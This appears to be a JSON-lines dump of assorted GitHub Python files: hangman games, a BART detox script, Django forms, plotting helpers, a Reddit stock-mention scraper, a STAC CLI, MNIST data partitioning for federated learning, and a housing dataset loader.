= input(\"Ingresa una letra o arriésgate a decir la palabra completa: \")\n\n if len(letra) == 1:\n palabra_oculta = revisar_letra(palabra_secreta, palabra_oculta, letra)\n if letra not in palabra_secreta:\n intentos -= 1\n print(\"La letra\", letra, \"no está en la palabra. Te quedan\", intentos, \"intentos.\")\n elif len(letra) == len(palabra_secreta) and letra.lower() == palabra_secreta.lower():\n print(\"¡Felicidades! Adivinaste la palabra secreta.\")\n break\n else:\n print(\"La palabra ingresada no es válida.\")\n\n if intentos == 0:\n print(\"\\n¡Perdiste! La palabra secreta era:\", palabra_secreta)\n","repo_name":"pabloschwarzenberg/grader","sub_path":"tema4_ej1/tema4_ej1_c89069016cbc84b9637ffd7501bbd72f.py","file_name":"tema4_ej1_c89069016cbc84b9637ffd7501bbd72f.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42674501028","text":"# Hangman game\n#\n\n# -----------------------------------\n# Helper code\n# You don't need to understand this helper code,\n# but you will have to know how to use the functions\n# (so be sure to read the docstrings!)\n\nimport random\nimport string\n\nWORDLIST_FILENAME = \"words.txt\"\n\ndef loadWords():\n \"\"\"\n Returns a list of valid words. Words are strings of lowercase letters.\n\n Depending on the size of the word list, this function may\n take a while to finish.\n \"\"\"\n print(\"Loading word list from file...\")\n # inFile: file\n inFile = open(WORDLIST_FILENAME, 'r')\n # line: string\n line = inFile.readline()\n # wordlist: list of strings\n wordlist = line.split()\n print(\" \", len(wordlist), \"words loaded.\")\n return wordlist\n\ndef chooseWord(wordlist):\n \"\"\"\n wordlist (list): list of words (strings)\n\n Returns a word from wordlist at random\n \"\"\"\n return random.choice(wordlist)\n\n# end of helper code\n# -----------------------------------\n\n# Load the list of words into the variable wordlist\n# so that it can be accessed from anywhere in the program\nwordlist = loadWords()\n\ndef isWordGuessed(secretWord, lettersGuessed):\n '''\n secretWord: string, the word the user is guessing\n lettersGuessed: list, what letters have been guessed so far\n returns: boolean, True if all the letters of secretWord are in lettersGuessed;\n False otherwise\n '''\n # FILL IN YOUR CODE HERE...\n for char in secretWord:\n if char not in lettersGuessed:\n return False\n return True\n\n\n\ndef getGuessedWord(secretWord, lettersGuessed):\n\n stringI = \"\"\n for char in secretWord:\n if char in lettersGuessed:\n stringI+=char+\" \"\n else:\n stringI+=\" _ \"\n\n return stringI\n\n\n\n\ndef getAvailableLetters(lettersGuessed):\n\n allletters = string.ascii_lowercase\n stringer = \"\"\n for letters in allletters:\n if letters not in lettersGuessed:\n stringer+= letters\n return stringer\n\n\n\n\ndef hangman(secretWord):\n\n\n\n secretWordlength = len(secretWord)\n # allowing user to make 8 guesses when they guess wrong\n numOfGuesses = 8\n lettersGuessed = []\n availableLetters = getAvailableLetters(lettersGuessed)\n print(\"Welcome To the HangMan Interactive Game\")\n print(\"The Word I am thinking of has {} letters.\".format(secretWordlength))\n print(\"---------------\")\n\n while True:\n print(\"You Have\",numOfGuesses,\"Left.\")\n availableLetters = getAvailableLetters(lettersGuessed)\n print(\"Available Letters:\",availableLetters)\n guesser = input(\"Please Guess a Letter: \")\n guess = guesser.lower()\n\n if guess in secretWord and guess not in lettersGuessed:\n lettersGuessed.append(guess)\n print(\"Good Guess : \",getGuessedWord(secretWord, lettersGuessed))\n\n elif guess not in secretWord and guess not in lettersGuessed:\n lettersGuessed.append(guess)\n numOfGuesses -=1\n print(\"Sorry that letter is not in my word\")\n elif guess in lettersGuessed:\n\n print(\"Sorry but you have already Guessed that letter try Again\")\n\n\n\n if isWordGuessed(secretWord, lettersGuessed) == True:\n print(\"Congratz You Won the word is \",secretWord)\n return\n if numOfGuesses <=1 :\n print(\"Sorry, you ran out of guesses. The word was\",secretWord)\n return\n print(\" \")\n\n\n\nsecretWord = chooseWord(wordlist).lower()\nhangman(secretWord)\n","repo_name":"chafiknaceri/Interactive-Hangman","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":3509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23951597997","text":"# Import necessary libraries and modules\nimport torch\nfrom transformers import BartForConditionalGeneration, AutoTokenizer\nimport numpy as np\nimport torch.nn as nn\n\n# Check if a CUDA-enabled GPU is available, otherwise use CPU\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n# Define the base model name and the specific model name to be used\nbase_model_name = 'facebook/bart-base'\nmodel_name = 'SkolkovoInstitute/bart-base-detox'\n\n# Initialize a tokenizer using the base model name\ntokenizer = AutoTokenizer.from_pretrained(base_model_name)\n\n# Initialize a BART model for conditional text generation using the specific model name\nmodel = BartForConditionalGeneration.from_pretrained(model_name)\n\n# Prompt the user to input the text they want to detoxify\nprint(\"Enter the text you want to detoxify:\")\ntext = input()\n\n# Tokenize the user's input text using the tokenizer and return it as PyTorch tensors\ntokenized_text = tokenizer(text, return_tensors='pt')\n\n# Generate detoxified text using the pre-trained model with a maximum of 512 new tokens\ngenerated_tokens = model.generate(**tokenized_text, max_new_tokens=512)\n\n# Decode the generated tokens into a readable detoxified text, skipping special tokens\nprint(tokenizer.decode(generated_tokens.squeeze(), skip_special_tokens=True))\n","repo_name":"naryst/PMDL_assignment1","sub_path":"src/models/BART_inference.py","file_name":"BART_inference.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73719195769","text":"# -*- coding: utf-8 -*-\n\nfrom django import forms\nfrom django.utils.translation import ugettext_lazy as _\n\n\nfrom accounting_core.models import AccountingYear\n\n\nclass ImportForm(forms.Form):\n\n year = forms.ModelChoiceField(label=_(u'L\\'année comptable'), queryset=AccountingYear.objects.filter(deleted=False).exclude(status='3_archived'))\n file = forms.FileField(label=_(u'Le fichier avec la compta'))\n type = forms.ChoiceField(label=_(u'Le type de fichier'), choices=[\n ('tab_2016', _(u'Format TAB 2016')),\n ('csv_2014', _(u'Format CSV 2014')),\n ])\n\n\nclass BudgetFilterForm(forms.Form):\n start = forms.DateField(label=_(u'Filtrer du'))\n end = forms.DateField(label=_(u'au'))\n\n def clean(self):\n\n cleaned_data = super(BudgetFilterForm, self).clean()\n\n if 'start' in cleaned_data and 'end' in cleaned_data and cleaned_data['start'] > cleaned_data['end']:\n raise forms.ValidationError(_(u'La date de fin ne peut pas être avant la date de début !'))\n\n return cleaned_data\n","repo_name":"ArcaniteSolutions/truffe2","sub_path":"truffe2/accounting_main/forms2.py","file_name":"forms2.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"77"} +{"seq_id":"72563152889","text":"import matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib.pyplot import cm\nimport seaborn as sns\n\nsns.set_style(\"white\")\nsns.set_context(\"poster\")\n\nOFFSET = 400\nBIN_X = np.arange(OFFSET/4,510,10) - 0.25\nBIN_Y = {\n '181-185': np.arange(21) * 0.03 + 0.25,\n '181-162': np.arange(40) * 0.02 + 0.05,\n '284-225': np.arange(45) * 0.05 + 2.8,\n '287-225': np.arange(45) * 0.05 + 2.8,\n '181': np.arange(11) - 0.5,\n '185': np.arange(11) - 0.5,\n '274': np.arange(11) - 0.5,\n '275': np.arange(11) - 0.5,\n 'W1W2': np.arange(8) - 0.5,\n 'ADP': np.arange(3) - 0.5,\n 'ADP0': np.arange(3) - 0.5,\n}\nAXIS = {\n '181-185': [OFFSET/4,500,0.25,0.85],\n '181-162':[OFFSET/4,500,0.05,0.83],\n '284-225':[OFFSET/4,500,2.8,5.0],\n '287-225':[OFFSET/4,500,2.8,5.0],\n '181':[OFFSET/4,500,-0.5,9.5],\n '185':[OFFSET/4,500,-0.5,9.5],\n '274':[OFFSET/4,500,-0.5,9.5],\n '275':[OFFSET/4,500,-0.5,9.5],\n 'W1W2':[OFFSET/4,500,-0.5,6.5],\n 'ADP': [OFFSET/4,500,-0.5,1.5],\n 'ADP0': [-0.5,4.5,-0.5,1.5],\n}\nXLABEL = 't (nanoseconds)'\n\ndef plot_2dhist(key, x_axis, y_data, weights, title, ylabel, filename):\n bin_x = BIN_X\n xlabel = XLABEL\n key = str(key)\n if key == 'ADP0':\n bin_x = np.arange(6) - 0.5\n xlabel = 'RUN'\n fig1 = plt.figure()\n plt.hist2d(x_axis[y_data > -1],y_data[y_data > -1],bins=[bin_x,BIN_Y[key]],weights=weights[y_data > -1],cmap=plt.get_cmap('inferno'))\n plt.title(title)\n plt.ylabel(ylabel)\n plt.xlabel(xlabel)\n plt.colorbar()\n plt.axis(AXIS[key])\n plt.savefig(filename,dpi=300)\n plt.close(fig1)\n print('Saved %s' % filename)\n\n","repo_name":"choderalab/AURKA_UMN","sub_path":"scripts/old/analyze/plot_function.py","file_name":"plot_function.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30769671945","text":"from tkinter import *\nimport time\nimport connection\nfrom tkinter import messagebox\n\n\ndef main_account_screen():\n \n main_screen = Tk() # create a GUI window \n main_screen.resizable(False, False)\n main_screen.geometry(\"300x220+600+100\") # set the configuration of GUI window \n main_screen.title(\"Registro de fotografias\") # set the title of GUI window\n \n # create a Form label \n Label(text=\"RUT\", bg=\"white\", width=\"300\", height=\"2\", font=(\"Calibri\", 13)).pack() \n Label(text=\"\").pack() \n\n # \n name = StringVar()\n fileName_lable = Label(main_screen, text=\"Rut cliente\")\n fileName_lable.pack()\n\n fileName_entry = Entry(main_screen, textvariable=name)\n fileName_entry.pack()\n \n spare_lable = Label(main_screen, text=\" \")\n spare_lable.pack()\n\n # create a register button\n \n\n def saveRut():\n global rut\n rut = name.get()\n\n llamada = connection.callUsers()\n if llamada.select_user(rut)==\"ERROR\":\n messagebox.showerror(\"Alerta\",\"Rut invalido\")\n\n else:\n time.sleep(1)\n main_screen.destroy()\n\n Button(text=\"Register\", height=\"2\", width=\"30\", command=saveRut).pack()\n\n main_screen.mainloop() # start the GUI\n \nmain_account_screen() # call the main_account_screen() function\n\n","repo_name":"igmm98/RepoPython","sub_path":"savePhotos.py","file_name":"savePhotos.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"4249637184","text":"import re\n\nf = open(\"./demo.txt\",mode=\"r\", encoding=\"utf-8\")\ncontent = f.read()\nf.close()\n\n\nstart = content.find(')') #开始截取位置\nprint('start',start)\n\ncontent = re.sub('浙ICP备05019169号',\"\",content)\n\npattern = re.compile(r'\\d+')\nlastNum = pattern.findall(content).pop(-1)\nprint('lastNum',lastNum)\nend = content.rindex(lastNum)\nprint('end',end)\ncontent = content[start:end] #末尾截取位置\n\n# print(content)\ncontent = re.sub(r'[^\\u4e00-\\u9fa5\\u9fa6-\\u9fef]+', \"\",content)\ncontent = re.sub(r'\\u672a\\u5206\\u7c7b',\"\",content)\nprint('',content)\n# content = re.sub(r'\\n', \"\",content)\n# content = content.split(',')\nem = ''\ni=''\n# for a in content:\n# a='\"'+a+'\"'+':'+'\"\",\\n'\n# print(a)\n# em+=a\n# print(content.encode(\"unicode_escape\"))\nfor a in content:\n i = str(a.encode(\"unicode_escape\"))\n i=i.replace(\"b'\\\\\",\" \")\n em+=i\n# print(em)\ncontent = re.sub(r\"[' ]\", \"\",em)\nfo = open(\"./hah.txt\", \"w\")\n# fo.write(content.encode('utf-8'))\nfo.write(content)\nfo.close()\n\n\n\n\n","repo_name":"fsrm-h/searchTitle","sub_path":"fl/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35694749843","text":"from psaw import PushshiftAPI\nimport config\nimport datetime\nimport psycopg2\nimport psycopg2.extras\nimport re\n\ntodays_date = datetime.date.today()\n\nconnection = psycopg2.connect(host=config.DB_HOST, database=config.DB_NAME, user=config.DB_USER, password=config.DB_PASS)\ncursor = connection.cursor(cursor_factory=psycopg2.extras.DictCursor)\ncursor.execute(\"\"\"\n SELECT * FROM stock\n\"\"\")\nrows = cursor.fetchall()\n\nstocks = {}\nfor row in rows:\n stocks[row['symbol']] = row['id']\n\n\napi = PushshiftAPI()\n\nstart_time = int(datetime.datetime(todays_date.year, todays_date.month, todays_date.day -10).timestamp())\n\nsubmissions = api.search_submissions(after=start_time,\n subreddit='wallstreetbets',\n filter=['url','author', 'title', 'subreddit'],\n )\n\n\n\nfor submission in submissions:\n# caps = []\n# try:\n# caps = re.findall('([A-Z]+(?=\\s[A-Z]+)(?:\\s[A-Z]+)+)', submission.title)\n# caps = caps[0].split()\n# print('--------------------------------{}-------------------'.format(caps))\n# except Exception:\n# pass\n#\n words = submission.title.split()\n cashtags = list(set(filter(lambda word: word.lower().startswith('$'), words)))\n# cashtags.extend(caps)\n\n if len(cashtags) > 0:\n print(cashtags)\n print(submission.title)\n\n for cashtag in cashtags:\n cashtag = cashtag.replace('$', '')\n cashtag = cashtag.title()\n if cashtag in stocks:\n submitted_time = datetime.datetime.fromtimestamp(submission.created_utc).isoformat()\n print(cashtag)\n\n try:\n cursor.execute(\"\"\"\n INSERT INTO mention (dt, stock_id, message, source, url)\n VALUES (%s, %s, %s, 'wallstreetbets', %s)\n \"\"\", (submitted_time, stocks[cashtag], submission.title, submission.url))\n\n connection.commit()\n except Exception as e:\n print(e)\n connection.rollback()\n","repo_name":"daveh11/wall_street_bets_analysis","sub_path":"search_wsb.py","file_name":"search_wsb.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73746803450","text":"import os\nimport click\nimport logging\n\nfrom stactools.jrc_gsw import stac\nfrom stactools.jrc_gsw.collections import (\n AGGREGATED,\n MONTHLY_HISTORY,\n MONTHLY_RECURRENCE,\n ROOT,\n YEARLY_CLASSIFICATION,\n)\n\nlogger = logging.getLogger(__name__)\n\n\ndef create_jrc_gsw_command(cli):\n \"\"\"Creates the joint research centre - global surface water command line utility.\"\"\"\n\n @cli.group(\n \"jrc-gsw\",\n short_help=(\"Commands for working with JRC-GSW data.\"),\n )\n def jrc_gsw():\n pass\n\n @jrc_gsw.command(\n \"create-collection\",\n short_help=\"Creates STAC collections for JRC-GSW data.\",\n )\n @click.option(\n \"-d\",\n \"--destination\",\n required=True,\n help=\"The output directory for the root STAC Collection json.\",\n )\n def create_collection_command(destination: str):\n \"\"\"Creates a STAC Collection for each mapped dataset from the European Commission\n Joint Research Centre - Global Surface Water program.\n\n Args:\n destination (str): Directory used to store the root STAC collection.\n Returns:\n Callable\n \"\"\"\n root_col = stac.create_collection(ROOT)\n\n for collection in [\n AGGREGATED,\n MONTHLY_HISTORY,\n MONTHLY_RECURRENCE,\n YEARLY_CLASSIFICATION,\n ]:\n col = stac.create_collection(collection)\n col.normalize_hrefs(destination)\n col.save()\n col.validate()\n root_col.add_child(col)\n\n root_col.normalize_hrefs(destination)\n root_col.save()\n root_col.validate()\n\n @jrc_gsw.command(\n \"create-item\",\n short_help=\"Create a STAC item from a given COG.\",\n )\n @click.option(\n \"-d\",\n \"--destination\",\n required=True,\n help=\"The output directory for the STAC json.\",\n )\n @click.option(\n \"-s\",\n \"--source\",\n required=True,\n help=\"The path to the COG.\",\n )\n def create_item_command(destination: str, source: str):\n \"\"\"Creates a STAC Item\n\n Args:\n destination (str): The output directory for the STAC json.\n source (str): The root data directory. Must follow the\n structure found in:\n http://jeodpp.jrc.ec.europa.eu/ftp/jrc-opendata/GSWE/\n \"\"\"\n item = stac.create_item(source, destination)\n item_path = os.path.join(destination, f\"{item.id}.json\")\n item.set_self_href(item_path)\n item.save_object()\n item.validate()\n\n return jrc_gsw\n","repo_name":"stactools-packages/jrc-gsw","sub_path":"src/stactools/jrc_gsw/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"31518613614","text":"from .dtos import OutputTemplate\nfrom ..domain.events.template import TemplateValueSet\nfrom .mappers import map_template_entity_to_output_dto\nfrom .template_message_bus import handle_event\nfrom ..domain import entities, value_objects\nfrom ..domain.ports.unit_of_work import UnitOfWork\nfrom ..domain.value_objects import INITIAL_TEMPLATE_VERSION\nfrom ...common.time import get_current_utc_timestamp\n\n\n# In this example app, there is no need to care much about history of changes,\n# and rather focus on separating business logic from infrastructure and data integrity.\n\n# In case there is a need to track history of changes,\n# adapts the following approach:\n# https://www.cosmicpython.com/book/part2.html.\n\n\ndef create_template(\n unit_of_work: UnitOfWork,\n) -> (\n OutputTemplate\n): # It's correct to return data from command when no data are queried.\n # This approach meets the CQS pattern rules.\n # More details can be found here:\n # https://martinfowler.com/bliki/CommandQuerySeparation.html.\n\n template = entities.Template(\n id=entities.Template.generate_id(),\n timestamp=get_current_utc_timestamp(),\n version=INITIAL_TEMPLATE_VERSION,\n )\n output = map_template_entity_to_output_dto(template)\n\n with unit_of_work:\n unit_of_work.templates.save(template)\n\n return output\n\n\ndef delete_template(\n unit_of_work: UnitOfWork,\n template_id: value_objects.TEMPLATE_ID_TYPE,\n):\n with unit_of_work:\n unit_of_work.templates.delete(template_id)\n\n\ndef set_template_value(\n unit_of_work: UnitOfWork,\n template_id: value_objects.TEMPLATE_ID_TYPE,\n value: value_objects.TemplateValue,\n):\n \"\"\"\n Allocate here invokes of business logic related to particular action,\n transaction management, and data transformations.\n\n In other words,\n allocate here bridge logic between the presentation and data access layers,\n or any other\n that doesn't belong neither to the domain layer nor to the infrastructure layer.\n \"\"\"\n\n with unit_of_work:\n template = unit_of_work.templates.get(template_id)\n entities.set_template_value(template=template, value=value)\n unit_of_work.templates.save(template)\n\n # In this approach, a service layer is responsible for generating events.\n # More details can be found here:\n # https://www.cosmicpython.com/book/chapter_08_events_and_message_bus.html.\n # Moreover, in this example we don't care much about\n handle_event(TemplateValueSet(template_id=template.id, value=value))\n","repo_name":"mglowinski93/LargeApplicationTemplate","sub_path":"backend/modules/template_module/services/template_services.py","file_name":"template_services.py","file_ext":"py","file_size_in_byte":2547,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"77"} +{"seq_id":"39899445912","text":"class Human:\r\n def __init__(self, name, occupation):\r\n self.name = name\r\n self.occupation = occupation\r\n\r\n def do_work(self):\r\n if self.occupation == 'Developer':\r\n print(self.name, 'does coding')\r\n elif self.occupation == 'CEO':\r\n print(self.name, \"leads Company\")\r\n else:\r\n print(self.name, 'is an employee')\r\n\r\n def speaks(self):\r\n print(self.name, \"says I can do it!!!\")\r\n\r\nname = input('Enter name: ')\r\nocc = input('Enter occupation: ')\r\nperson = Human(name, occ)\r\nperson.do_work()\r\nperson.speaks()","repo_name":"Dheeraj-02NK/Data-Structures","sub_path":"01. Basics/Classes.py","file_name":"Classes.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"37339066212","text":"def first_non_repeat(string):\n '''\n return the first character that is unique inside the passed string\n by checking the first letter with rest of string then moving it to the \n back of the string if it is non unique\n '''\n result = None\n if len(string) == 1:\n # if the string has only 1 character, that character is unique!\n return string[0]\n else:\n for n in range(len(string)):\n first_letter = string[0]\n rest_of_string = string[1:]\n if first_letter in rest_of_string:\n string = rest_of_string + first_letter\n else:\n result = first_letter\n break\n return result\n\n# OK, so the algorithm above works, but I've since realized that Python includes a count()\n# method on strings... duh\n\ndef first_non_repeat_using_count(string):\n '''\n return the first letter that occurs only once in the string, starting from the beginning\n '''\n result = None\n for letter in string:\n if string.count(letter) == 1:\n result = letter\n break\n return result\n\n\n\n","repo_name":"qdonnellan/random_questions","sub_path":"questions/arrays_and_strings/strings/first_non_repeat.py","file_name":"first_non_repeat.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1153788706","text":"import sys\nsys.stdin = open(\"input.txt\", 'r')\ninput = sys.stdin.readline\n\nimport collections\n\nN, M = map(int, input().rstrip().split())\nS = map(lambda x:x.rstrip(), sys.stdin)\nS = sorted(filter(lambda x:len(x)>=M, S))\n\nc = list(collections.Counter(S).items())\nc.sort(key=lambda x:(-x[1], -len(x[0]), x[0]))\nfor v in c:\n print(v[0])","repo_name":"hjyoon/baekjoon-answers","sub_path":"_20000/20920.py","file_name":"20920.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37849655157","text":"import numpy as np\nimport torch\nimport torchvision\nfrom matplotlib import pyplot\nfrom torch.utils.data import DataLoader, Dataset\n\n\nclass LoadData:\n def __init__(self,\n dataset: str,\n train: bool,\n subset: bool):\n \"\"\"\n Class handles loading data for many separate nodes.\n\n :param dataset: Which dataset to load\n :param train: boolean to load train or test dataset\n :param subset: Only load a fraction of data. Hardcoded to 30%.\n \"\"\"\n\n PERCENT = .3\n\n if dataset == 'MNIST':\n data = torchvision.datasets.MNIST('./data', train=train, download=True,\n transform=torchvision.transforms.Compose([\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize(\n (0.1307,), (0.3081,))\n ]))\n else:\n raise ValueError\n\n data_size = len(data)\n self.data = data\n\n if subset:\n indx = torch.randperm(data_size)[:int(data_size * PERCENT)]\n self.samples = self.data.data[indx, :, :]\n self.labels = self.data.targets[indx]\n else:\n self.samples = self.data.data\n self.labels = self.data.targets\n\n self.random_seed = 42\n\n def get_data(self):\n return self.samples, self.labels\n\n def partition(self, to_partition, indices, nr_agents):\n \"\"\"\n Separate data into number of agents\n\n :param to_partition: data to partition\n :param indices: indices by which to partition\n :param nr_agents: number of partitions to create\n :return: list of partitioned data\n \"\"\"\n return [to_partition[indices[i]:indices[i + 1]] for i in range(nr_agents)]\n\n def split(self, how, nr_agents, **kwargs):\n \"\"\"\n Different ways to split data between nodes.\n\n :param how: ['random', 'uniform', 'non_iid_uniform', 'non_iid_random']\n :param nr_agents: number of agents to split data between\n :param kwargs: additional class_per_node argument for non_iid case\n :return: data partitioned according to :param how.\n \"\"\"\n if how == 'random':\n self.random_split(nr_agents)\n elif how == 'uniform':\n self.uniform_split(nr_agents)\n elif how == 'non_iid_uniform':\n self.non_iid_split(nr_agents, kwargs['class_per_node'], random=False)\n elif how == 'non_iid_random':\n self.non_iid_split(nr_agents, kwargs['class_per_node'], random=True)\n\n return self.get_data()\n\n def random_split(self, nr_agents):\n \"\"\"\n Give each Node random splits of data. Nodes will have different amounts of data.\n\n :param nr_agents:\n \"\"\"\n np.random.seed(self.random_seed)\n # Get random indices\n indices = sorted(np.random.randint(0, high=self.samples.shape[0], size=nr_agents - 1).tolist())\n indices = [0] + indices\n indices += [self.samples.shape[0]]\n\n self.samples = self.partition(self.samples, indices, nr_agents)\n self.labels = self.partition(self.labels, indices, nr_agents)\n\n def uniform_split(self, nr_agents):\n \"\"\"\n Give each Node uniform splits of data. Nodes will have same amounts of data.\n\n :param nr_agents:\n \"\"\"\n indices = np.linspace(start=0, stop=self.samples.shape[0], num=nr_agents + 1, dtype=int).tolist()\n\n self.samples = self.partition(self.samples, indices, nr_agents)\n self.labels = self.partition(self.labels, indices, nr_agents)\n\n def non_iid_split(self, nr_agents, class_per_node, random):\n \"\"\"\n Give nodes only certain number of class labels as data.\n\n :param nr_agents:\n :param class_per_node: number of class labels per node\n :param random: boolean denoting random or uniform split of data\n \"\"\"\n unique = list(set(self.labels.tolist()))\n len_unique = len(unique)\n\n # Create array that assigns a class to specific nodes\n # Use 'np.arange' to ensure every class is represented before repeating\n # A row represents nr_agents, a column represents classes per node\n agent_class_master = np.arange(start=0, stop=nr_agents * class_per_node) % len_unique\n np.random.shuffle(agent_class_master)\n agent_class_master = agent_class_master.reshape(nr_agents, class_per_node)\n\n # Split data by labels\n sample_list = [[] for _ in range(len_unique)]\n for i in range(len(self.labels)):\n sample_list[self.labels[i]].append(self.samples[i])\n\n # By class creates uniform or random indices splits to partition data to agents evenly\n class_count = np.bincount(agent_class_master.ravel())\n class_indices = {}\n for i in range(len(class_count)):\n if random:\n indices = sorted(np.random.randint(0, high=len(sample_list[i]), size=class_count[i] - 1).tolist())\n indices = [0] + indices\n indices += [len(sample_list[i])]\n class_indices[i] = indices\n else:\n class_indices[i] = np.linspace(start=0, stop=len(sample_list[i]), num=class_count[i] + 1,\n dtype=int).tolist()\n\n # Main loop that partitions data by the assigned class and proper amount\n all_agents = []\n all_class = []\n for agent in agent_class_master:\n agent_data = []\n agent_class = []\n for cls in agent:\n # Proportioned indices for data and grab correctly indexed data\n temp_indices = class_indices[cls]\n data_for_agent = sample_list[cls][temp_indices[0]:temp_indices[1] - 1]\n\n # Add data and class to this agents list\n agent_data = agent_data + data_for_agent\n agent_class = agent_class + [cls for _ in range(len(data_for_agent))]\n\n # Drop first index since we used that data, forces next person to use next index\n class_indices[cls] = temp_indices[1:]\n\n # Append agents data and class labels in order\n all_agents.append(torch.stack(agent_data))\n all_class.append(torch.tensor(agent_class))\n\n self.samples = all_agents\n self.labels = all_class\n\n\nclass CustomDataset(Dataset):\n \"\"\"\n Creates dataset with both boolean and class labels.\n \"\"\"\n\n def __init__(self, inputs, targets):\n \"\"\"\n :param inputs: Images 2x14x14\n :param targets: Class Label\n \"\"\"\n super(Dataset, self).__init__()\n self.data = []\n for inp, tgt in zip(inputs, targets):\n self.data.append([inp, tgt])\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, idx):\n return self.data[idx][0], self.data[idx][1]\n\n\ndef load_mnist_data(nr_nodes, nr_classes, allocation, subset, batch_size):\n \"\"\"\n Uses LoadData class to partition prepare data. Puts data into dataloader objects to make use of batching and shuffling.\n\n :param nr_nodes:\n :param nr_classes: if non_iid data, number class labels per node\n :param allocation: ['random', 'uniform', 'non_iid_uniform', 'non_iid_random'] how to split data\n :param subset: subset of data\n :param batch_size:\n :return:\n \"\"\"\n train_loader_list = []\n test_loader_list = []\n\n train = LoadData('MNIST', True, subset)\n test = LoadData('MNIST', False, False)\n\n train_data, train_targets = train.split(allocation, nr_nodes, class_per_node=nr_classes)\n for data, targets in zip(train_data, train_targets):\n train_dataset = CustomDataset(data, targets)\n train_loader_list.append(DataLoader(train_dataset, batch_size=batch_size, shuffle=True))\n\n test_data, test_targets = test.split('uniform', nr_nodes)\n for data, targets in zip(test_data, test_targets):\n test_dataset = CustomDataset(data, targets)\n test_loader_list.append(DataLoader(test_dataset, batch_size=batch_size, shuffle=False))\n\n return train_loader_list, test_loader_list\n\n\ndef plot_mnist(data):\n for i in range(9):\n pyplot.subplot(330 + 1 + i)\n a = data[i]\n pyplot.imshow(data[i], cmap=pyplot.get_cmap('gray'))\n pyplot.show()\n","repo_name":"Devrim-Celik/OptimML","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":8730,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"69893447610","text":"import os\nimport sys\nimport tarfile\nimport urllib.request\n\n# import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import StratifiedShuffleSplit\n\nfrom common import PROJECT_ROOT_DIR\n\nDOWNLOAD_ROOT = \"https://raw.githubusercontent.com/ageron/handson-ml2/master/\"\nHOUSING_PATH = os.path.join(PROJECT_ROOT_DIR, \"datasets\", \"housing\")\nHOUSING_URL = DOWNLOAD_ROOT + \"datasets/housing/housing.tgz\"\n\n\ndef fetch_housing_data(housing_url=HOUSING_URL, housing_path=HOUSING_PATH):\n os.makedirs(housing_path, exist_ok=True)\n tgz_path = os.path.join(housing_path, \"housing.tgz\")\n urllib.request.urlretrieve(housing_url, tgz_path)\n housing_tgz = tarfile.open(tgz_path)\n housing_tgz.extractall(path=housing_path)\n housing_tgz.close()\n\n\ndef load_housing_data(housing_path=HOUSING_PATH):\n csv_path = os.path.join(housing_path, \"housing.csv\")\n return pd.read_csv(csv_path)\n\n\ndef split_train_test(data, test_ratio):\n shuffled_indices = np.random.permutation(len(data))\n test_set_size = int(len(data) * test_ratio)\n test_indices = shuffled_indices[:test_set_size]\n train_indices = shuffled_indices[test_set_size:]\n return data.iloc[train_indices], data.iloc[test_indices]\n\n\ndef strata(data):\n data[\"income_cat\"] = pd.cut(data[\"median_income\"],\n bins=[0., 1.5, 3.0, 4.5, 6., np.inf],\n labels=[1, 2, 3, 4, 5])\n return data\n\n\ndef split_data(data):\n split = StratifiedShuffleSplit(n_splits=1, test_size=0.2, random_state=42)\n strata_test_set = None\n strata_train_set = None\n for train_index, test_index in split.split(data, data[\"income_cat\"]):\n strata_train_set = data.loc[train_index]\n strata_test_set = data.loc[test_index]\n return [strata_train_set, strata_test_set]\n\n\ndef train_test_sets():\n fetch_housing_data()\n data = load_housing_data()\n # train_set, test_set = split_train_test(housing, 0.2)\n # housing_with_id = housing.reset_index()\n # train_set, test_set = train_test_split(housing, test_size=0.2, random_state=42)\n strata(data)\n # housing[\"income_cat\"].hist()\n # plt.show()\n train_test = split_data(data)\n for set_ in train_test:\n set_.drop(\"income_cat\", axis=1, inplace=True)\n return train_test\n\n\nif __name__ == '__main__':\n train_test_sets()\n 